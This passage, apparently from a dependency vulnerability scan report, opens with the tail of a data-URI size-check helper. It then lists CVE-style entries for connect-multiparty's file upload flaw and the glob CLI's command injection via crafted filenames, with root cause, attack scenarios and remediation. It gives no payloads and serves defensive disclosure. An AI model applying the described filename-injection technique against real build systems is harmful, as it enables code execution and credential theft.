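      `data: payload ~${decodedBytes} bytes exceeds limit of ${maxBytes}`
    );
  }
}

// Passes: tiny payload well under the limit.
assertDataUriWithinLimit('data:text/plain;base64,aGVsbG8=', 1024);
```

Calling the helper before axiosClient.get() in the link-preview service above would turn the unbounded allocation into an early, cheap rejection.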
Stream decoding
Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.
connect-multiparty2.2.0 (npm)
pkg:npm/connect-multiparty@2.2.0
Unrestricted Upload of File with Dangerous Type
Affected range
<=2.2.0
Fixed version
Not Fixed
CVSS Score
7.8
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score
0.448%
EPSS Percentile
63rd percentile
Description
An arbitrary file upload vulnerability in the file upload module of Express Connect-Multiparty 2.2.0 allows attackers to execute arbitrary code via a crafted PDF file. NOTE: the Supplier has not verified this vulnerability report.
glob10.4.5 (npm)
pkg:npm/glob@10.4.5
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Affected range
>=10.2.0 <10.5.0
Fixed version
11.1.0
CVSS Score
7.5
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS Score
0.038%
EPSS Percentile
11th percentile
Description
Summary
The glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c <command> <patterns> is used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges.
Details
Root Cause:
The vulnerability exists in src/bin.mts:277 where the CLI collects glob matches and executes the supplied command using foregroundChild() with shell: true:
Commands execute with full privileges of the user running glob CLI
No privilege escalation required - runs as current user
Access to environment variables, file system, and network
Real-World Attack Scenarios:
1. CI/CD Pipeline Compromise:
Malicious PR adds files with crafted names to repository
CI pipeline uses glob -c to process files (linting, testing, deployment)
Commands execute in CI environment with build secrets and deployment credentials
Potential for supply chain compromise through artifact tampering
2. Developer Workstation Attack:
Developer clones repository or extracts archive containing malicious filenames
Local build scripts use glob -c for file processing
Developer machine compromise with access to SSH keys, tokens, local services
3. Automated Processing Systems:
Services using glob CLI to process uploaded files or external content
File uploads with malicious names trigger command execution
Server-side compromise with potential for lateral movement
4. Supply Chain Poisoning:
Malicious packages or themes include files with crafted names
Build processes using glob CLI automatically process these files
Wide distribution of compromise through package ecosystems
Platform-Specific Risks:
POSIX/Linux/macOS: High risk due to flexible filename characters and shell parsing
Windows: Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL
Mixed Environments: CI systems often use Linux containers regardless of developer platform
Affected Products
Ecosystem: npm
Package name: glob
Component: CLI only (src/bin.mts)
Affected versions: v10.2.0 through v11.0.3 (and likely later versions until patched)
Introduced: v10.2.0 (first release with CLI containing -c/--cmd option)
Patched versions: 11.1.0 and 10.5.0
Scope Limitation:
Library API Not Affected: Core glob functions (glob(), globSync(), async iterators) are safe
CLI-Specific: Only the command-line interface with -c/--cmd option is vulnerable
Remediation
Upgrade to glob@10.5.0, glob@11.1.0, or higher, as soon as possible.
If any glob CLI actions fail, convert commands containing positional arguments to use the --cmd-arg/-g option instead.
As a last resort, use --shell to maintain shell:true behavior until glob v12, but take care to ensure that no untrusted contents can possibly be encountered in the file path results.